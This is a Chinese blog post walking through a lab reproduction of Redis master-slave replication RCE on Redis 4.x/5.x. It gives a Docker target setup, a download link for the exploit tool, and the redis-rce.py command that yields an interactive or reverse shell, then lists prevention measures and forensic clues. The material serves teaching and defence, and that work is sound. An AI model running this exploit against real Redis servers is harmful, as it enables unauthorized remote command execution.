Redis基于主从复制的RCE

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量2.4k 收藏 1
点赞数 1
分类专栏: 漏洞 文章标签: redis 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/127297104
版权

一 简介

主从复制的工作流程原理可以看下这篇文章,推荐看一下原理再做复现

Redis——Redis主从复制(工作流程详解)_stan Z的博客-CSDN博客_redis主从复制流程

 二 影响范围

优势:可用在高版本redis上,redis4.x;5.x都可以,这些高版本的利用方式像:写入公钥,启动任务项都做了安全防护,不可用。

三 漏洞复现

        1.环境搭建

                攻击机:192.168.1.145

                靶机:192.168.1.153

                这里使用centos7虚拟机使用docker拉取镜像进行搭建

                使用以下命令进行搭建

             docker search redis5.0 //查找镜像

             docker pull damonevking/redis5.0 //拉取下图第三个镜像

             docker run -p 6379:6379 -d damonevking/redis5.0 redis-serve  //运行容器,端口映射

出现以下图片说明搭建成功

         2.漏洞复现(交互式shell,以及反弹shell)

                 下载漏洞利用的工具

链接:https://pan.baidu.com/s/1gxJBpV1QWnrkTR_yZ81Izw 
提取码:wars

 使用以下命令运行脚本进行尝试攻击

python 3 redis-rce.py -r 192.168.1.153(目标Ip) -L 192.168.1.145(攻击机ip) -f exp.so

运行脚本后i为交互式shell,r为反弹shell

交互式shell如下图:

反弹shell如下,根据提示输入Ip,与监听的端口 (记得要在攻击机监听端口哦) 

四  预防方法

很多主从复制导致任意命令执行都是通过Redis的未授权访问漏洞导致了横向移动攻击方式的发生

1. 主动关闭Redis的6379端口不对外开放;

2. 设置密码认证,通过远程访问Redis服务的都要经过密码认证才能访问。

五 入侵溯源思路

1. 查看redis服务器的网络连接,一般master会与slave通过6379端口进行通信,当redis子进程有未知的端口的网络连接时,多半都是恶意的反弹或者一些网络下载行为;

2. 查看命令历史,很可能攻击者会通过wget,或者curl这些网络工具下载一些恶意脚本到本地可写目录linux,常见的就是/mnt/目录下,着重审查。

 

种树人1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Redis主从复制
y1701的博客
09-29 690
Redis主从复制
Redis主从复制
xiayubao7788的博客
08-02 127
一、Redis主从复制 1.什么是主从复制 行话:主机数据更新后,根据配置和策略,自动同步到备机的master/slave机制,Master以写为主、Slave以读为主。 2.主从复制能干嘛? 读写分离 读写分离是用来处理读的并发量大,而写的并发量小的场景 容灾恢复 二、如何使用主从复制 1.配从(库)不配主(库) 2.从库配置 SLAVEOF 127.0.0.1 6379 3.修改配置...
Redis主从复制实现RCE
rev1ve的博客
12-01 2275
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
redis主从复制
weixin_63231007的博客
02-28 1721
redis主从复制原理以及简单演示(环境真难搭)
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 1017
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
wangluoanquan111的博客
08-01 317
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
Redis未授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1910
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
Redis主从漏洞和远程连接漏洞
LeeZbug的博客
02-16 3733
主从复制漏洞: 参考文章:Redis主从复制getshell技巧 - Bypass - 博客园 1.so和rce文件下载:GitHub - LeeZBug/redis-rce: Redis 4.x/5.x RCE 下载后安装所需要的python库,pip install -r requirement.txt 2.运行rce python redis-rce.py -r [target_ip] -L [attack_ip] -a [redis_require_password] -f module
Redis主从复制ppt分享
07-16
部分复制则是对网络中断后丢失数据的补充,基于复制偏移量、复制积压缓冲区和服务器运行ID来实现。从节点通过`psync`命令携带之前的runid和offset尝试部分复制,主节点根据条件决定是否进行。 总的来说,Redis的...
Redis主从复制1
08-03
Redis主从复制主从复制Redis高可用性的一种重要实现方式,它通过将主节点的数据实时复制到从节点,确保数据的冗余备份和故障恢复能力。此外,主从复制还能实现读写分离,提升服务器负载能力,是构建更复杂...
Redis主从复制以及主从复制技术原理.docx
10-14
Redis 主从复制技术原理 概述 Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。Redis 主从复制是指将一台 Redis 服务器的数据,复制到...
LAMP架构+Redis主从复制.docx
10-08
LAMP架构是指Linux操作系统、Apache HTTP服务器、MySQL数据库和PHP编程语言的组合,而Redis则是一个开源的、基于内存的数据存储系统,本文将详细介绍如何安装和配置LAMP架构,并使用Redis主从复制实现高可用性。...
Redis主从复制和集群配置
08-21
Redis主从复制和集群配置说明
Redis进行RCE利用总结
weixin_50464560的博客
11-07 1928
百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。连接到redis,输入以下指令利用crontab反弹shell。Redis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务,且已知工作目录为。kali中打开一个新的命令行窗口执行。
记某次简单的从Redis弱口令到主从复制RCE
末初的CSDN博客
08-21 920
记一次从Redis弱口令到RCE
春秋云镜-【仿真场景】Brute4Road writeup
渗透测试研究中心
03-07 1039
说明Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Redis、Brute Force、SMB、Privilege Elevation、域渗透第一个flagredis主从复制RCEf...
红队攻防实战之Redis-RCE集锦
自强不息
12-08 647
心若有所向往,何惧道阻且长
一文清晰带你认识redis漏洞
逍遥小哥的博客
02-01 1523
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 988
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
redis主从复制的主从配置
05-01
Redis主从复制是一种常见的数据制和高可用方案,它通过将一个Redis实例(主节点)的数据复制到其他Redis实例(从节点)来实现数据的备份和读写分离。 主从配置的步骤如下: 1. 配置主节点:在主节点的配置文件...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值